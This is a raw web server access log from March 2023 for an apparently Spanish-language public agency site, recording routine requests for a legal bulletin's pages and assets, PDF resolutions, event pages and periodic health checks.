172.22.2.4 - - [05/Mar/2023:08:54:57 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [05/Mar/2023:08:54:57 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [05/Mar/2023:08:54:57 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [05/Mar/2023:08:54:57 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [05/Mar/2023:08:54:57 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [05/Mar/2023:08:54:57 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [05/Mar/2023:08:54:57 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [05/Mar/2023:08:54:57 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [05/Mar/2023:08:54:57 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [05/Mar/2023:08:54:57 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [05/Mar/2023:08:54:57 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [05/Mar/2023:08:54:57 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [05/Mar/2023:08:54:57 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [05/Mar/2023:08:54:57 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [05/Mar/2023:08:54:57 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [05/Mar/2023:08:54:57 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [05/Mar/2023:08:54:57 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [05/Mar/2023:08:54:57 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [05/Mar/2023:08:54:57 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [05/Mar/2023:08:54:57 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [05/Mar/2023:08:54:57 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [05/Mar/2023:08:54:57 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [05/Mar/2023:08:54:57 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [05/Mar/2023:08:54:57 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [05/Mar/2023:08:54:57 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [05/Mar/2023:08:54:57 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [05/Mar/2023:08:54:57 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [05/Mar/2023:08:54:57 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [05/Mar/2023:08:54:57 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [05/Mar/2023:08:54:57 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [05/Mar/2023:08:54:57 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
172.22.2.4 - - [05/Mar/2023:08:55:08 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2023&resuelve= HTTP/1.1" 200 20562
172.22.2.4 - - [05/Mar/2023:08:55:08 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
172.22.2.4 - - [05/Mar/2023:08:55:09 -0500] "GET /BLA/boletinlegal/images/background.gif HTTP/1.1" 200 -
172.22.2.4 - - [05/Mar/2023:08:55:13 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [05/Mar/2023:08:55:14 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [05/Mar/2023:08:55:40 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
172.22.2.4 - - [05/Mar/2023:08:55:42 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 4882842
216.245.221.92 - - [05/Mar/2023:08:55:44 -0500] "HEAD / HTTP/1.1" 200 -
181.54.228.54 - - [05/Mar/2023:08:56:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4444.pdf HTTP/1.1" 200 474421
181.54.228.54 - - [05/Mar/2023:08:56:39 -0500] "GET /BLA/resoluciones/AUTOS%202022/6728.pdf HTTP/1.1" 200 1462142
181.54.228.54 - - [05/Mar/2023:08:56:40 -0500] "GET /BLA/resoluciones/AUTOS%202022/6584.pdf HTTP/1.1" 200 456004
201.245.192.253 - - [05/Mar/2023:08:56:47 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40529
191.156.54.81 - - [05/Mar/2023:08:57:18 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
191.156.57.141 - - [05/Mar/2023:08:57:18 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
191.156.54.81 - - [05/Mar/2023:08:57:18 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
172.22.2.4 - - [05/Mar/2023:08:57:20 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
181.54.228.54 - - [05/Mar/2023:08:59:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4443.pdf HTTP/1.1" 200 475395
172.22.2.4 - - [05/Mar/2023:08:58:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57935
181.54.228.54 - - [05/Mar/2023:08:59:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3646.pdf HTTP/1.1" 200 325430
191.95.54.38 - - [05/Mar/2023:09:00:15 -0500] "GET /inscribete-y-participa-en-las-caminatas-ecologicas-de-marzo.html HTTP/1.1" 200 924
191.95.22.21 - - [05/Mar/2023:09:00:17 -0500] "GET /inscribete-y-participa-en-las-caminatas-ecologicas-de-marzo.html HTTP/1.1" 200 924
216.245.221.92 - - [05/Mar/2023:09:00:44 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [05/Mar/2023:09:01:46 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40529
31.13.127.26 - - [05/Mar/2023:09:02:11 -0500] "GET /images/calidad-aire-2-marzo-1_optimized.jpeg HTTP/1.1" 200 51562
68.183.36.192 - - [05/Mar/2023:09:02:12 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110197
173.252.87.119 - - [05/Mar/2023:09:04:45 -0500] "GET /images/caminatas-ecol\xc3\xb3gicas-marzo---1920x1080_optimized.jpg HTTP/1.1" 404 1034
172.22.2.4 - - [05/Mar/2023:09:04:49 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [05/Mar/2023:09:03:10 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Mar/2023:09:04:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59646
216.245.221.92 - - [05/Mar/2023:09:05:44 -0500] "HEAD / HTTP/1.1" 200 -
191.95.56.127 - - [05/Mar/2023:09:06:21 -0500] "GET /inscribete-y-participa-en-las-caminatas-ecologicas-de-marzo.html HTTP/1.1" 200 924
